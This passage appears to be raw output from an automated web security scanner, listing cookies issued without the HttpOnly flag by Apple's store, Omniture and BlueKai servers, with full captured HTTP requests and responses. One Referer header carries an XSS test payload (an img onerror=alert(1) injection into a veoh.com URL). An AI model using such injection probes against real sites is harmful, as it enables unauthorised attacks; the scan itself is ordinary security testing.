ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1-800-MY-APPLE/WebObjects/AppleStore.woa/wa/RSLID HTTP/1.1 Host: store.apple.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dfa_cookie=appleglobal%2Capplehome; s_pathLength=homepage%3D1%2C; geo=US; s_sq=%5B%5BB%5D%5D; s_ppv=100%2C100%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3B; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=apple%20-%20index%20(US);
Redirecting to <a HREF="http://store.apple.com/1-800-MY-APPLE/WebObjects/AppleStore.woa/920044001/wo/csKICi1o0fYy23BuHZ269hYUg3j/0.">http://store.apple.com/1-800-MY-APPLE/WebObjects/Ap ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Apple/WebObjects/OrderStatus.woa HTTP/1.1 Host: store.apple.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B10E0[CE]; Expires=Tue, 2 Feb 2016 20:32:32 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/superpagesadvert/1/H.14/s01692645419389 HTTP/1.1 Host: superpages.122.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 20:32:32 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B10E0[CE]; Expires=Tue, 2 Feb 2016 20:32:32 GMT; Domain=.2o7.net; Path=/ Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s01692645419389?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Wed, 02 Feb 2011 20:32:32 GMT Last-Modified: Fri, 04 Feb 2011 20:32:32 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www354 Content-Length: 0 Content-Type: text/plain Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F5[CE]; Expires=Tue, 2 Feb 2016 19:50:13 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/superpagesadvert/1/H.14/s03453267652075 HTTP/1.1 Host: superpages.122.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 19:50:13 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F5[CE]; Expires=Tue, 2 Feb 2016 19:50:13 GMT; Domain=.2o7.net; Path=/ Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s03453267652075?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Wed, 02 Feb 2011 19:50:13 GMT Last-Modified: Fri, 04 Feb 2011 19:50:13 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www379 Content-Length: 0 Content-Type: text/plain Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F5[CE]; Expires=Tue, 2 Feb 2016 19:50:13 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/superpagesadvert/1/H.14/s04304838050156 HTTP/1.1 Host: superpages.122.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 19:50:13 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F5[CE]; Expires=Tue, 2 Feb 2016 19:50:13 GMT; Domain=.2o7.net; Path=/ Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s04304838050156?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Wed, 02 Feb 2011 19:50:13 GMT Last-Modified: Fri, 04 Feb 2011 19:50:13 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www298 Content-Length: 0 Content-Type: text/plain Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F1[CE]; Expires=Tue, 2 Feb 2016 19:50:09 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/superpagesadvert/1/H.14/s07192756696604 HTTP/1.1 Host: superpages.122.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 19:50:09 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F1[CE]; Expires=Tue, 2 Feb 2016 19:50:09 GMT; Domain=.2o7.net; Path=/ Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s07192756696604?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Wed, 02 Feb 2011 19:50:09 GMT Last-Modified: Fri, 04 Feb 2011 19:50:09 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www70 Content-Length: 0 Content-Type: text/plain Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4AFFAE[CE]; Expires=Tue, 2 Feb 2016 19:19:10 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/superpagesadvert/1/H.14/s07964217748958 HTTP/1.1 Host: superpages.122.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 19:19:10 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4AFFAE[CE]; Expires=Tue, 2 Feb 2016 19:19:10 GMT; Domain=.2o7.net; Path=/ Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s07964217748958?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Wed, 02 Feb 2011 19:19:10 GMT Last-Modified: Fri, 04 Feb 2011 19:19:10 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www262 Content-Length: 0 Content-Type: text/plain Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F2[CE]; Expires=Tue, 2 Feb 2016 19:50:10 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/superpagesadvert/1/H.14/s081445949617 HTTP/1.1 Host: superpages.122.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 19:50:10 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F2[CE]; Expires=Tue, 2 Feb 2016 19:50:10 GMT; Domain=.2o7.net; Path=/ Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s081445949617?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Wed, 02 Feb 2011 19:50:10 GMT Last-Modified: Fri, 04 Feb 2011 19:50:10 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www384 Content-Length: 0 Content-Type: text/plain Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site/2174 HTTP/1.1 Host: tags.bluekai.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJyE8VBQrsg+f1F/G1gnywedoutxBRZBQKWJA1UsT16nREW00wcOVcK9R+Ijp/WLuSOR3gTVA9D9U19xnx==; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzC8sAU24bebUlPjK6GZj2Mebc0QKZRsn3ebJ4m2zpx+xnSOlmwRy9YZD8Gjsn8Mz5zrLn8uSySsaE4UzDttHnq73gDpla6x2xUtxxyQAdXYN5F1NacALxvojIOkRJOBRsH/N5KYZCX9BNXSf9XxYeJQ5kokiI8F5cXLR9vjdXumQucZBtzr9J0qGo9=; bkst=KJhMR5Mehx9W+0LX4PAReQcjvQhsaCSJaZRZjg3VvRRsrijJ8AZbuzRoSqGoiHRZhLqs8oSVSKqkBf09biX9Nq1pkmjk8IVU8dAyZymawQYaCOk1eWh1M1yLe/h1EY61nzlBM/6LcMvOowZ8yqSOtqfzunolQTPS1/VZ9/DDsch5XQN0yLJBFnh541NXiLnzL6o10Nv2A6r5w101AX/eEPb9ln1D3aSSy57HB5MPB5pUFXent2y2w3xXnb303BhE+0MR8w2nVb90UCbysXlBeWyLMuy+nR61Mu61e1tBMRdDQt0DTtPQTsa/5lBB23G351bvX1gbX1XJvBTnaB5Qv121i5zNO/SYCRsoiSkhFWZviSs8AjsHoqkHD3vJcMeQEW6+nYlLN8RfIQ/9LG8V89==; bk=s/wmp1UR22QsHNJo; bkc=KJh566N/PaWDOded7x2N7OALjoWPDh9bZC9PYkjup+eYs7C2xJusVm/c+OY7BCVk/TC/jJLvtAPONAvyyWUHNtJG6uT/CsezOOWsWVlDxvpmKKd55I4zpUFXKm4MzL28dxgGMxOdUI2p/iQDILAwqhrUSTOwkTcRV+bCEtOdcJUZ4mt71SOoesCRpM+CvB4lgAF4+zp8tF4MxaVBx+r0PTI2jpIWmPbfPmF8bC4M/lcoH1ATHL8Bu92mug2dRwy0urTO8ZTzelyinLl2+52u4GEbkSXjEIIu87C+fL4Fb4GrNlwI2dUDqiKvN9ufR6obRzaTiJJZB2w1rGbbIKy7kgZK5GAKpfzODpzfbqTlb+MpkMkKK6zubs8DKaU1AodPL72Z/1pht74/o2LD1k50EQJqyO8rkmjTfUcS7tipyAT07Td2QFSg6FmVmP2fo+gpY+NcYnXstJN26k7nbEcMVjgk/53l4pXmrdURO0hp4Vtb4G0uFNUTArPK0pumy1m6nTF7Q12nOywUJbD8UprjGc2hAXvcR7FQ+uooM+zIxd4E1Qv1MOLlVIjTfqwIKDdbnFg2YtcMY8qd5OFlCnlTBbatZ7d/2VHSIksg2swn8p13Xs2ddfIsFwgLDlcoX/g6EnDvUm4w3NpC4vF62NUoNcRPsw8IerN+Yj0fJqlRG/E4jSulBAkljvVwVD84BwTw/Leb1Q==; bkdc=res
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 20:52:27 GMT P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml" Expires: Fri, 04 Feb 2011 20:52:27 GMT Cache-Control: max-age=86400, private Set-Cookie: bk=hgA1oXUR22QsHNJo; expires=Tue, 02-Aug-2011 20:52:27 GMT; path=/; domain=.bluekai.com Set-Cookie: bkc=KJh566N/PaWDOded4EmMMMmehu00RCJYhyI/YQDgvV5GRxtXwiOvx0GoCHqiNvSi59xHiVhExqLG0aG/agQGIkG1n5GaQHY1Z0eY/vvBsDx48fplfg+pfrR24+hpf7Zzz2bx9QSMyBXUm2yGiLDCXg6qhoDbTw6a/n8VzmA/fc5M6o0FduQm+/TepuLaBynkI4RPbPrVmPdfEQvG3PwGVFcFRtdqYVsmN0fUIff66UC4xMojBGbEX8wu8bSAl2yN4CRMeyepPyIswoux8FgSg0QduFD3kTN7+AopFeqUTd51R8d7IKeX5fg5MuW20Kbjkk8zBObZon7NBnmIdPTIIbakFAIfE/X7ZTeoSflDfpXBf9UncvI2JxU6+0QXnIU/MIFjlf/x87M+ZIuMUxgjilAlixNQMfH/zfptOmNwgWtCiK0Q3jl2kwSgtQrVmP2f++qlvFUey4KpfB8E6M7nZUcMmjgkc+3l4NdlKFNCffn12t+EIpasdkpkX8Rcn51TxGdxFi059eTLfyf5ZJnZ4mNDAFfa5xoFu2tCNt3AmPffswV7RhxR7EOrLXphtLKefp6zrOEDn6S1ENFINVXXWwcMUpg5BcdcXNHsI7b729wnJf132/2QdpX8dFlL/y7o0vg6qv6vlHe13Nnkx346k8dubz63B/n2cBfKWEodUU3oVxZdpAoFqJUr0DA4LJy8Rdy45E7fPQ==; expires=Tue, 02-Aug-2011 20:52:27 GMT; path=/; domain=.bluekai.com Set-Cookie: bkdc=res; expires=Fri, 04-Feb-2011 20:52:27 GMT; path=/; domain=.bluekai.com BK-Server: 1c6d Content-Length: 62 Content-Type: image/gif Connection: keep-alive
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site/2491?ss_rand=637007605 HTTP/1.1 Host: tags.bluekai.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJyE8VBQrsg+f1F/G1gnywedoutxBRZBQKWJA1UsT16nREW00wcOVcK9R+Ijp/WLuSOR3gTVA9D9U19xnx==; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzC8sAU24bebUlPjK6GZj2Mebc0QKZRsn3ebJ4m2zpx+xnSOlmwRy9YZD8Gjsn8Mz5zrLn8uSySsaE4UzDttHnq73gDpla6x2xUtxxyQAdXYN5F1NacALxvojIOkRJOBRsH/N5KYZCX9BNXSf9XxYeJQ5kokiI8F5cXLR9vjdXumQucZBtzr9J0qGo9=; bkst=KJhMR5Mehx9W+0LX4PAReQcjvQhsaCSJaZRZjg3VvRRsrijJ8AZbuzRoSqGoiHRZhLqs8oSVSKqkBf09biX9Nq1pkmjk8IVU8dAyZymawQYaCOk1eWh1M1yLe/h1EY61nzlBM/6LcMvOowZ8yqSOtqfzunolQTPS1/VZ9/DDsch5XQN0yLJBFnh541NXiLnzL6o10Nv2A6r5w101AX/eEPb9ln1D3aSSy57HB5MPB5pUFXent2y2w3xXnb303BhE+0MR8w2nVb90UCbysXlBeWyLMuy+nR61Mu61e1tBMRdDQt0DTtPQTsa/5lBB23G351bvX1gbX1XJvBTnaB5Qv121i5zNO/SYCRsoiSkhFWZviSs8AjsHoqkHD3vJcMeQEW6+nYlLN8RfIQ/9LG8V89==; bk=hgA1oXUR22QsHNJo; 